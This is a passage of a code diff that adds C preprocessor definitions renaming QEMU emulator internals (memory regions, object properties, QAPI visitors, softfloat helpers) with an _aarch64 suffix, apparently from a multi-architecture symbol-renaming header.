+#define mem_begin mem_begin_aarch64 +#define mem_commit mem_commit_aarch64 +#define memory_access_is_direct memory_access_is_direct_aarch64 +#define memory_access_size memory_access_size_aarch64 +#define memory_init memory_init_aarch64 +#define memory_listener_match memory_listener_match_aarch64 +#define memory_listener_register memory_listener_register_aarch64 +#define memory_listener_unregister memory_listener_unregister_aarch64 +#define memory_map_init memory_map_init_aarch64 +#define memory_mapping_filter memory_mapping_filter_aarch64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_aarch64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_aarch64 +#define memory_mapping_list_free memory_mapping_list_free_aarch64 +#define memory_mapping_list_init memory_mapping_list_init_aarch64 +#define memory_region_access_valid memory_region_access_valid_aarch64 +#define memory_region_add_subregion memory_region_add_subregion_aarch64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_aarch64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_aarch64 +#define memory_region_big_endian memory_region_big_endian_aarch64 +#define memory_region_clear_pending memory_region_clear_pending_aarch64 +#define memory_region_del_subregion memory_region_del_subregion_aarch64 +#define memory_region_destructor_alias memory_region_destructor_alias_aarch64 +#define memory_region_destructor_none memory_region_destructor_none_aarch64 +#define memory_region_destructor_ram memory_region_destructor_ram_aarch64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_aarch64 +#define memory_region_dispatch_read memory_region_dispatch_read_aarch64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_aarch64 +#define memory_region_dispatch_write memory_region_dispatch_write_aarch64 +#define memory_region_escape_name memory_region_escape_name_aarch64 +#define memory_region_finalize memory_region_finalize_aarch64 +#define memory_region_find memory_region_find_aarch64 +#define memory_region_get_addr memory_region_get_addr_aarch64 +#define memory_region_get_alignment memory_region_get_alignment_aarch64 +#define memory_region_get_container memory_region_get_container_aarch64 +#define memory_region_get_fd memory_region_get_fd_aarch64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_aarch64 +#define memory_region_get_priority memory_region_get_priority_aarch64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_aarch64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_aarch64 +#define memory_region_get_size memory_region_get_size_aarch64 +#define memory_region_info memory_region_info_aarch64 +#define memory_region_init memory_region_init_aarch64 +#define memory_region_init_alias memory_region_init_alias_aarch64 +#define memory_region_initfn memory_region_initfn_aarch64 +#define memory_region_init_io memory_region_init_io_aarch64 +#define memory_region_init_ram memory_region_init_ram_aarch64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_aarch64 +#define memory_region_init_reservation memory_region_init_reservation_aarch64 +#define memory_region_is_iommu memory_region_is_iommu_aarch64 +#define memory_region_is_logging memory_region_is_logging_aarch64 +#define memory_region_is_mapped memory_region_is_mapped_aarch64 +#define memory_region_is_ram memory_region_is_ram_aarch64 +#define memory_region_is_rom memory_region_is_rom_aarch64 +#define memory_region_is_romd memory_region_is_romd_aarch64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_aarch64 +#define memory_region_is_unassigned memory_region_is_unassigned_aarch64 +#define memory_region_name memory_region_name_aarch64 +#define memory_region_need_escape memory_region_need_escape_aarch64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_aarch64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_aarch64 +#define memory_region_present memory_region_present_aarch64 +#define memory_region_read_accessor memory_region_read_accessor_aarch64 +#define memory_region_readd_subregion memory_region_readd_subregion_aarch64 +#define memory_region_ref memory_region_ref_aarch64 +#define memory_region_resolve_container memory_region_resolve_container_aarch64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_aarch64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_aarch64 +#define memory_region_set_address memory_region_set_address_aarch64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_aarch64 +#define memory_region_set_enabled memory_region_set_enabled_aarch64 +#define memory_region_set_readonly memory_region_set_readonly_aarch64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_aarch64 +#define memory_region_size memory_region_size_aarch64 +#define memory_region_to_address_space memory_region_to_address_space_aarch64 +#define memory_region_transaction_begin memory_region_transaction_begin_aarch64 +#define memory_region_transaction_commit memory_region_transaction_commit_aarch64 +#define memory_region_unref memory_region_unref_aarch64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_aarch64 +#define memory_region_write_accessor memory_region_write_accessor_aarch64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_aarch64 +#define memory_try_enable_merging memory_try_enable_merging_aarch64 +#define module_call_init module_call_init_aarch64 +#define module_load module_load_aarch64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_aarch64 +#define mpidr_read mpidr_read_aarch64 +#define msr_mask msr_mask_aarch64 +#define mul128By64To192 mul128By64To192_aarch64 +#define mul128To256 mul128To256_aarch64 +#define mul64To128 mul64To128_aarch64 +#define muldiv64 muldiv64_aarch64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_aarch64 +#define neon_2rm_sizes neon_2rm_sizes_aarch64 +#define neon_3r_sizes neon_3r_sizes_aarch64 +#define neon_get_scalar neon_get_scalar_aarch64 +#define neon_load_reg neon_load_reg_aarch64 +#define neon_load_reg64 neon_load_reg64_aarch64 +#define neon_load_scratch neon_load_scratch_aarch64 +#define neon_ls_element_type neon_ls_element_type_aarch64 +#define neon_reg_offset neon_reg_offset_aarch64 +#define neon_store_reg neon_store_reg_aarch64 +#define neon_store_reg64 neon_store_reg64_aarch64 +#define neon_store_scratch neon_store_scratch_aarch64 +#define new_ldst_label new_ldst_label_aarch64 +#define next_list next_list_aarch64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_aarch64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_aarch64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_aarch64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_aarch64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_aarch64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_aarch64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_aarch64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_aarch64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_aarch64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_aarch64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_aarch64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_aarch64 +#define object_child_foreach object_child_foreach_aarch64 +#define object_class_foreach object_class_foreach_aarch64 +#define object_class_foreach_tramp object_class_foreach_tramp_aarch64 +#define object_class_get_list object_class_get_list_aarch64 +#define object_class_get_list_tramp object_class_get_list_tramp_aarch64 +#define object_class_get_parent object_class_get_parent_aarch64 +#define object_deinit object_deinit_aarch64 +#define object_dynamic_cast object_dynamic_cast_aarch64 +#define object_finalize object_finalize_aarch64 +#define object_finalize_child_property object_finalize_child_property_aarch64 +#define object_get_child_property object_get_child_property_aarch64 +#define object_get_link_property object_get_link_property_aarch64 +#define object_get_root object_get_root_aarch64 +#define object_initialize_with_type object_initialize_with_type_aarch64 +#define object_init_with_type object_init_with_type_aarch64 +#define object_instance_init object_instance_init_aarch64 +#define object_new_with_type object_new_with_type_aarch64 +#define object_post_init_with_type object_post_init_with_type_aarch64 +#define object_property_add_alias object_property_add_alias_aarch64 +#define object_property_add_link object_property_add_link_aarch64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_aarch64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_aarch64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_aarch64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_aarch64 +#define object_property_allow_set_link object_property_allow_set_link_aarch64 +#define object_property_del object_property_del_aarch64 +#define object_property_del_all object_property_del_all_aarch64 +#define object_property_find object_property_find_aarch64 +#define object_property_get object_property_get_aarch64 +#define object_property_get_bool object_property_get_bool_aarch64 +#define object_property_get_int object_property_get_int_aarch64 +#define object_property_get_link object_property_get_link_aarch64 +#define object_property_get_qobject object_property_get_qobject_aarch64 +#define object_property_get_str object_property_get_str_aarch64 +#define object_property_get_type object_property_get_type_aarch64 +#define object_property_is_child object_property_is_child_aarch64 +#define object_property_set object_property_set_aarch64 +#define object_property_set_description object_property_set_description_aarch64 +#define object_property_set_link object_property_set_link_aarch64 +#define object_property_set_qobject object_property_set_qobject_aarch64 +#define object_release_link_property object_release_link_property_aarch64 +#define object_resolve_abs_path object_resolve_abs_path_aarch64 +#define object_resolve_child_property object_resolve_child_property_aarch64 +#define object_resolve_link object_resolve_link_aarch64 +#define object_resolve_link_property object_resolve_link_property_aarch64 +#define object_resolve_partial_path object_resolve_partial_path_aarch64 +#define object_resolve_path object_resolve_path_aarch64 +#define object_resolve_path_component object_resolve_path_component_aarch64 +#define object_resolve_path_type object_resolve_path_type_aarch64 +#define object_set_link_property object_set_link_property_aarch64 +#define object_unparent object_unparent_aarch64 +#define omap_cachemaint_write omap_cachemaint_write_aarch64 +#define omap_cp_reginfo omap_cp_reginfo_aarch64 +#define omap_threadid_write omap_threadid_write_aarch64 +#define omap_ticonfig_write omap_ticonfig_write_aarch64 +#define omap_wfi_write omap_wfi_write_aarch64 +#define op_bits op_bits_aarch64 +#define open_modeflags open_modeflags_aarch64 +#define op_to_mov op_to_mov_aarch64 +#define op_to_movi op_to_movi_aarch64 +#define output_type_enum output_type_enum_aarch64 +#define packFloat128 packFloat128_aarch64 +#define packFloat16 packFloat16_aarch64 +#define packFloat32 packFloat32_aarch64 +#define packFloat64 packFloat64_aarch64 +#define packFloatx80 packFloatx80_aarch64 +#define page_find page_find_aarch64 +#define page_find_alloc page_find_alloc_aarch64 +#define page_flush_tb page_flush_tb_aarch64 +#define page_flush_tb_1 page_flush_tb_1_aarch64 +#define page_init page_init_aarch64 +#define page_size_init page_size_init_aarch64 +#define par par_aarch64 +#define parse_array parse_array_aarch64 +#define parse_error parse_error_aarch64 +#define parse_escape parse_escape_aarch64 +#define parse_keyword parse_keyword_aarch64 +#define parse_literal parse_literal_aarch64 +#define parse_object parse_object_aarch64 +#define parse_optional parse_optional_aarch64 +#define parse_option_bool parse_option_bool_aarch64 +#define parse_option_number parse_option_number_aarch64 +#define parse_option_size parse_option_size_aarch64 +#define parse_pair parse_pair_aarch64 +#define parser_context_free parser_context_free_aarch64 +#define parser_context_new parser_context_new_aarch64 +#define parser_context_peek_token parser_context_peek_token_aarch64 +#define parser_context_pop_token parser_context_pop_token_aarch64 +#define parser_context_restore parser_context_restore_aarch64 +#define parser_context_save parser_context_save_aarch64 +#define parse_str parse_str_aarch64 +#define parse_type_bool parse_type_bool_aarch64 +#define parse_type_int parse_type_int_aarch64 +#define parse_type_number parse_type_number_aarch64 +#define parse_type_size parse_type_size_aarch64 +#define parse_type_str parse_type_str_aarch64 +#define parse_value parse_value_aarch64 +#define par_write par_write_aarch64 +#define patch_reloc patch_reloc_aarch64 +#define phys_map_node_alloc phys_map_node_alloc_aarch64 +#define phys_map_node_reserve phys_map_node_reserve_aarch64 +#define phys_mem_alloc phys_mem_alloc_aarch64 +#define phys_mem_set_alloc phys_mem_set_alloc_aarch64 +#define phys_page_compact phys_page_compact_aarch64 +#define phys_page_compact_all phys_page_compact_all_aarch64 +#define phys_page_find phys_page_find_aarch64 +#define phys_page_set phys_page_set_aarch64 +#define phys_page_set_level phys_page_set_level_aarch64 +#define phys_section_add phys_section_add_aarch64 +#define phys_section_destroy phys_section_destroy_aarch64 +#define phys_sections_free phys_sections_free_aarch64 +#define pickNaN pickNaN_aarch64 +#define pickNaNMulAdd pickNaNMulAdd_aarch64 +#define pmccfiltr_write pmccfiltr_write_aarch64 +#define pmccntr_read pmccntr_read_aarch64 +#define pmccntr_sync pmccntr_sync_aarch64 +#define pmccntr_write pmccntr_write_aarch64 +#define pmccntr_write32 pmccntr_write32_aarch64 +#define pmcntenclr_write pmcntenclr_write_aarch64 +#define pmcntenset_write pmcntenset_write_aarch64 +#define pmcr_write pmcr_write_aarch64 +#define pmintenclr_write pmintenclr_write_aarch64 +#define pmintenset_write pmintenset_write_aarch64 +#define pmovsr_write pmovsr_write_aarch64 +#define pmreg_access pmreg_access_aarch64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_aarch64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_aarch64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_aarch64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_aarch64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_aarch64 +#define pmuserenr_write pmuserenr_write_aarch64 +#define pmxevtyper_write pmxevtyper_write_aarch64 +#define print_type_bool print_type_bool_aarch64 +#define print_type_int print_type_int_aarch64 +#define print_type_number print_type_number_aarch64 +#define print_type_size print_type_size_aarch64 +#define print_type_str print_type_str_aarch64 +#define propagateFloat128NaN propagateFloat128NaN_aarch64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_aarch64 +#define propagateFloat32NaN propagateFloat32NaN_aarch64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_aarch64 +#define propagateFloat64NaN propagateFloat64NaN_aarch64 +#define propagateFloatx80NaN propagateFloatx80NaN_aarch64 +#define property_get_alias property_get_alias_aarch64 +#define property_get_bool property_get_bool_aarch64 +#define property_get_str property_get_str_aarch64 +#define property_get_uint16_ptr property_get_uint16_ptr_aarch64 +#define property_get_uint32_ptr property_get_uint32_ptr_aarch64 +#define property_get_uint64_ptr property_get_uint64_ptr_aarch64 +#define property_get_uint8_ptr property_get_uint8_ptr_aarch64 +#define property_release_alias property_release_alias_aarch64 +#define property_release_bool property_release_bool_aarch64 +#define property_release_str property_release_str_aarch64 +#define property_resolve_alias property_resolve_alias_aarch64 +#define property_set_alias property_set_alias_aarch64 +#define property_set_bool property_set_bool_aarch64 +#define property_set_str property_set_str_aarch64 +#define pstate_read pstate_read_aarch64 +#define pstate_write pstate_write_aarch64 +#define pxa250_initfn pxa250_initfn_aarch64 +#define pxa255_initfn pxa255_initfn_aarch64 +#define pxa260_initfn pxa260_initfn_aarch64 +#define pxa261_initfn pxa261_initfn_aarch64 +#define pxa262_initfn pxa262_initfn_aarch64 +#define pxa270a0_initfn pxa270a0_initfn_aarch64 +#define pxa270a1_initfn pxa270a1_initfn_aarch64 +#define pxa270b0_initfn pxa270b0_initfn_aarch64 +#define pxa270b1_initfn pxa270b1_initfn_aarch64 +#define pxa270c0_initfn pxa270c0_initfn_aarch64 +#define pxa270c5_initfn pxa270c5_initfn_aarch64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_aarch64 +#define qapi_dealloc_end_list qapi_dealloc_end_list_aarch64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_aarch64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_aarch64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_aarch64 +#define qapi_dealloc_pop qapi_dealloc_pop_aarch64 +#define qapi_dealloc_push qapi_dealloc_push_aarch64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_aarch64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_aarch64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_aarch64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_aarch64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_aarch64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_aarch64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_aarch64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_aarch64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_aarch64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_aarch64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_aarch64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_aarch64 +#define qapi_free_boolList qapi_free_boolList_aarch64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_aarch64 +#define qapi_free_int16List qapi_free_int16List_aarch64 +#define qapi_free_int32List qapi_free_int32List_aarch64 +#define qapi_free_int64List qapi_free_int64List_aarch64 +#define qapi_free_int8List qapi_free_int8List_aarch64 +#define qapi_free_intList qapi_free_intList_aarch64 +#define qapi_free_numberList qapi_free_numberList_aarch64 +#define qapi_free_strList qapi_free_strList_aarch64 +#define qapi_free_uint16List qapi_free_uint16List_aarch64 +#define qapi_free_uint32List qapi_free_uint32List_aarch64 +#define qapi_free_uint64List qapi_free_uint64List_aarch64 +#define qapi_free_uint8List qapi_free_uint8List_aarch64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_aarch64 +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_aarch64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_aarch64 +#define qbool_destroy_obj qbool_destroy_obj_aarch64 +#define qbool_from_int qbool_from_int_aarch64 +#define qbool_get_int qbool_get_int_aarch64 +#define qbool_type qbool_type_aarch64 +#define qbus_create qbus_create_aarch64 +#define qbus_create_inplace qbus_create_inplace_aarch64 +#define qbus_finalize qbus_finalize_aarch64 +#define qbus_initfn qbus_initfn_aarch64 +#define qbus_realize qbus_realize_aarch64 +#define qdev_create qdev_create_aarch64 +#define qdev_get_type qdev_get_type_aarch64 +#define qdev_register_types qdev_register_types_aarch64 +#define qdev_set_parent_bus qdev_set_parent_bus_aarch64 +#define qdev_try_create qdev_try_create_aarch64 +#define qdict_add_key qdict_add_key_aarch64 +#define qdict_array_split qdict_array_split_aarch64 +#define qdict_clone_shallow qdict_clone_shallow_aarch64 +#define qdict_del qdict_del_aarch64 +#define qdict_destroy_obj qdict_destroy_obj_aarch64 +#define qdict_entry_key qdict_entry_key_aarch64 +#define qdict_entry_value qdict_entry_value_aarch64 +#define qdict_extract_subqdict qdict_extract_subqdict_aarch64 +#define qdict_find qdict_find_aarch64 +#define qdict_first qdict_first_aarch64 +#define qdict_flatten qdict_flatten_aarch64 +#define qdict_flatten_qdict qdict_flatten_qdict_aarch64 +#define qdict_flatten_qlist qdict_flatten_qlist_aarch64 +#define qdict_get qdict_get_aarch64 +#define qdict_get_bool qdict_get_bool_aarch64 +#define qdict_get_double qdict_get_double_aarch64 +#define qdict_get_int qdict_get_int_aarch64 +#define qdict_get_obj qdict_get_obj_aarch64 +#define qdict_get_qdict qdict_get_qdict_aarch64 +#define qdict_get_qlist qdict_get_qlist_aarch64 +#define qdict_get_str qdict_get_str_aarch64 +#define qdict_get_try_bool qdict_get_try_bool_aarch64 +#define qdict_get_try_int qdict_get_try_int_aarch64 +#define qdict_get_try_str qdict_get_try_str_aarch64 +#define qdict_haskey qdict_haskey_aarch64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_aarch64 +#define qdict_iter qdict_iter_aarch64 +#define qdict_join qdict_join_aarch64 +#define qdict_new qdict_new_aarch64 +#define qdict_next qdict_next_aarch64 +#define qdict_next_entry qdict_next_entry_aarch64 +#define qdict_put_obj qdict_put_obj_aarch64 +#define qdict_size qdict_size_aarch64 +#define qdict_type qdict_type_aarch64 +#define qemu_clock_get_us qemu_clock_get_us_aarch64 +#define qemu_clock_ptr qemu_clock_ptr_aarch64 +#define qemu_clocks qemu_clocks_aarch64 +#define qemu_get_cpu qemu_get_cpu_aarch64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_aarch64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_aarch64 +#define qemu_get_ram_block qemu_get_ram_block_aarch64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_aarch64 +#define qemu_get_ram_fd qemu_get_ram_fd_aarch64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_aarch64 +#define qemu_host_page_mask qemu_host_page_mask_aarch64 +#define qemu_host_page_size qemu_host_page_size_aarch64 +#define qemu_init_vcpu qemu_init_vcpu_aarch64 +#define qemu_ld_helpers qemu_ld_helpers_aarch64 +#define qemu_log_close qemu_log_close_aarch64 +#define qemu_log_enabled qemu_log_enabled_aarch64 +#define qemu_log_flush qemu_log_flush_aarch64 +#define qemu_loglevel_mask qemu_loglevel_mask_aarch64 +#define qemu_log_vprintf qemu_log_vprintf_aarch64 +#define qemu_oom_check qemu_oom_check_aarch64 +#define qemu_parse_fd qemu_parse_fd_aarch64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_aarch64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_aarch64 +#define qemu_ram_alloc qemu_ram_alloc_aarch64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_aarch64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_aarch64 +#define qemu_ram_free qemu_ram_free_aarch64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_aarch64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_aarch64 +#define qemu_ram_remap qemu_ram_remap_aarch64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_aarch64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_aarch64 +#define qemu_real_host_page_size qemu_real_host_page_size_aarch64 +#define qemu_st_helpers qemu_st_helpers_aarch64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_aarch64 +#define qemu_try_memalign qemu_try_memalign_aarch64 +#define qentry_destroy qentry_destroy_aarch64 +#define qerror_human qerror_human_aarch64 +#define qerror_report qerror_report_aarch64 +#define qerror_report_err qerror_report_err_aarch64 +#define qfloat_destroy_obj qfloat_destroy_obj_aarch64 +#define qfloat_from_double qfloat_from_double_aarch64 +#define qfloat_get_double qfloat_get_double_aarch64 +#define qfloat_type qfloat_type_aarch64 +#define qint_destroy_obj qint_destroy_obj_aarch64 +#define qint_from_int qint_from_int_aarch64 +#define qint_get_int qint_get_int_aarch64 +#define qint_type qint_type_aarch64 +#define qlist_append_obj qlist_append_obj_aarch64 +#define qlist_copy qlist_copy_aarch64 +#define qlist_copy_elem qlist_copy_elem_aarch64 +#define qlist_destroy_obj qlist_destroy_obj_aarch64 +#define qlist_empty qlist_empty_aarch64 +#define qlist_entry_obj qlist_entry_obj_aarch64 +#define qlist_first qlist_first_aarch64 +#define qlist_iter qlist_iter_aarch64 +#define qlist_new qlist_new_aarch64 +#define qlist_next qlist_next_aarch64 +#define qlist_peek qlist_peek_aarch64 +#define qlist_pop qlist_pop_aarch64 +#define qlist_size qlist_size_aarch64 +#define qlist_size_iter qlist_size_iter_aarch64 +#define qlist_type qlist_type_aarch64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_aarch64 +#define qmp_input_end_list qmp_input_end_list_aarch64 +#define qmp_input_end_struct qmp_input_end_struct_aarch64 +#define qmp_input_get_next_type qmp_input_get_next_type_aarch64 +#define qmp_input_get_object qmp_input_get_object_aarch64 +#define qmp_input_get_visitor qmp_input_get_visitor_aarch64 +#define qmp_input_next_list qmp_input_next_list_aarch64 +#define qmp_input_optional qmp_input_optional_aarch64 +#define qmp_input_pop qmp_input_pop_aarch64 +#define qmp_input_push qmp_input_push_aarch64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_aarch64 +#define qmp_input_start_list qmp_input_start_list_aarch64 +#define qmp_input_start_struct qmp_input_start_struct_aarch64 +#define qmp_input_type_bool qmp_input_type_bool_aarch64 +#define qmp_input_type_int qmp_input_type_int_aarch64 +#define qmp_input_type_number qmp_input_type_number_aarch64 +#define qmp_input_type_str qmp_input_type_str_aarch64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_aarch64 +#define qmp_input_visitor_new qmp_input_visitor_new_aarch64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_aarch64 +#define qmp_output_add_obj qmp_output_add_obj_aarch64 +#define qmp_output_end_list qmp_output_end_list_aarch64 +#define qmp_output_end_struct qmp_output_end_struct_aarch64 +#define qmp_output_first qmp_output_first_aarch64 +#define qmp_output_get_qobject qmp_output_get_qobject_aarch64 +#define qmp_output_get_visitor qmp_output_get_visitor_aarch64 +#define qmp_output_last qmp_output_last_aarch64 +#define qmp_output_next_list qmp_output_next_list_aarch64 +#define qmp_output_pop qmp_output_pop_aarch64 +#define qmp_output_push_obj qmp_output_push_obj_aarch64 +#define qmp_output_start_list qmp_output_start_list_aarch64 +#define qmp_output_start_struct qmp_output_start_struct_aarch64 +#define qmp_output_type_bool qmp_output_type_bool_aarch64 +#define qmp_output_type_int qmp_output_type_int_aarch64 +#define qmp_output_type_number qmp_output_type_number_aarch64 +#define qmp_output_type_str qmp_output_type_str_aarch64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_aarch64 +#define qmp_output_visitor_new qmp_output_visitor_new_aarch64 +#define qobject_decref qobject_decref_aarch64 +#define qobject_to_qbool qobject_to_qbool_aarch64 +#define qobject_to_qdict qobject_to_qdict_aarch64 +#define qobject_to_qfloat qobject_to_qfloat_aarch64 +#define qobject_to_qint qobject_to_qint_aarch64 +#define qobject_to_qlist qobject_to_qlist_aarch64 +#define qobject_to_qstring qobject_to_qstring_aarch64 +#define qobject_type qobject_type_aarch64 +#define qstring_append qstring_append_aarch64 +#define qstring_append_chr qstring_append_chr_aarch64 +#define qstring_append_int qstring_append_int_aarch64 +#define qstring_destroy_obj qstring_destroy_obj_aarch64 +#define qstring_from_escaped_str qstring_from_escaped_str_aarch64 +#define qstring_from_str qstring_from_str_aarch64 +#define qstring_from_substr qstring_from_substr_aarch64 +#define qstring_get_length qstring_get_length_aarch64 +#define qstring_get_str qstring_get_str_aarch64 +#define qstring_new qstring_new_aarch64 +#define qstring_type qstring_type_aarch64 +#define ram_block_add ram_block_add_aarch64 +#define ram_size ram_size_aarch64 +#define range_compare range_compare_aarch64 +#define range_covers_byte range_covers_byte_aarch64 +#define range_get_last range_get_last_aarch64 +#define range_merge range_merge_aarch64 +#define ranges_can_merge ranges_can_merge_aarch64 +#define raw_read raw_read_aarch64 +#define raw_write raw_write_aarch64 +#define rcon rcon_aarch64 +#define read_raw_cp_reg read_raw_cp_reg_aarch64 +#define recip_estimate recip_estimate_aarch64 +#define recip_sqrt_estimate recip_sqrt_estimate_aarch64 +#define register_cp_regs_for_features register_cp_regs_for_features_aarch64 +#define register_multipage register_multipage_aarch64 +#define register_subpage register_subpage_aarch64 +#define register_tm_clones register_tm_clones_aarch64 +#define register_types_object register_types_object_aarch64 +#define regnames regnames_aarch64 +#define render_memory_region render_memory_region_aarch64 +#define reset_all_temps reset_all_temps_aarch64 +#define reset_temp reset_temp_aarch64 +#define rol32 rol32_aarch64 +#define rol64 rol64_aarch64 +#define ror32 ror32_aarch64 +#define ror64 ror64_aarch64 +#define roundAndPackFloat128 roundAndPackFloat128_aarch64 +#define roundAndPackFloat16 roundAndPackFloat16_aarch64 +#define roundAndPackFloat32 roundAndPackFloat32_aarch64 +#define roundAndPackFloat64 roundAndPackFloat64_aarch64 +#define roundAndPackFloatx80 roundAndPackFloatx80_aarch64 +#define roundAndPackInt32 roundAndPackInt32_aarch64 +#define roundAndPackInt64 roundAndPackInt64_aarch64 +#define roundAndPackUint64 roundAndPackUint64_aarch64 +#define round_to_inf round_to_inf_aarch64 +#define run_on_cpu run_on_cpu_aarch64 +#define s0 s0_aarch64 +#define S0 S0_aarch64 +#define s1 s1_aarch64 +#define S1 S1_aarch64 +#define sa1100_initfn sa1100_initfn_aarch64 +#define sa1110_initfn sa1110_initfn_aarch64 +#define save_globals save_globals_aarch64 +#define scr_write scr_write_aarch64 +#define sctlr_write sctlr_write_aarch64 +#define set_bit set_bit_aarch64 +#define set_bits set_bits_aarch64 +#define set_default_nan_mode set_default_nan_mode_aarch64 +#define set_feature set_feature_aarch64 +#define set_float_detect_tininess set_float_detect_tininess_aarch64 +#define set_float_exception_flags set_float_exception_flags_aarch64 +#define set_float_rounding_mode set_float_rounding_mode_aarch64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_aarch64 +#define set_flush_to_zero set_flush_to_zero_aarch64 +#define set_swi_errno set_swi_errno_aarch64 +#define sextract32 sextract32_aarch64 +#define sextract64 sextract64_aarch64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_aarch64 +#define shift128Right shift128Right_aarch64 +#define shift128RightJamming shift128RightJamming_aarch64 +#define shift32RightJamming shift32RightJamming_aarch64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_aarch64 +#define shift64RightJamming shift64RightJamming_aarch64 +#define shifter_out_im shifter_out_im_aarch64 +#define shortShift128Left shortShift128Left_aarch64 +#define shortShift192Left shortShift192Left_aarch64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_aarch64 +#define size_code_gen_buffer size_code_gen_buffer_aarch64 +#define softmmu_lock_user softmmu_lock_user_aarch64 +#define softmmu_lock_user_string softmmu_lock_user_string_aarch64 +#define softmmu_tget32 softmmu_tget32_aarch64 +#define softmmu_tget8 softmmu_tget8_aarch64 +#define softmmu_tput32 softmmu_tput32_aarch64 +#define softmmu_unlock_user softmmu_unlock_user_aarch64 +#define sort_constraints sort_constraints_aarch64 +#define sp_el0_access sp_el0_access_aarch64 +#define spsel_read spsel_read_aarch64 +#define spsel_write spsel_write_aarch64 +#define start_list start_list_aarch64 +#define stb_p stb_p_aarch64 +#define stb_phys stb_phys_aarch64 +#define stl_be_p stl_be_p_aarch64 +#define stl_be_phys stl_be_phys_aarch64 +#define stl_he_p stl_he_p_aarch64 +#define stl_le_p stl_le_p_aarch64 +#define stl_le_phys stl_le_phys_aarch64 +#define stl_phys stl_phys_aarch64 +#define stl_phys_internal stl_phys_internal_aarch64 +#define 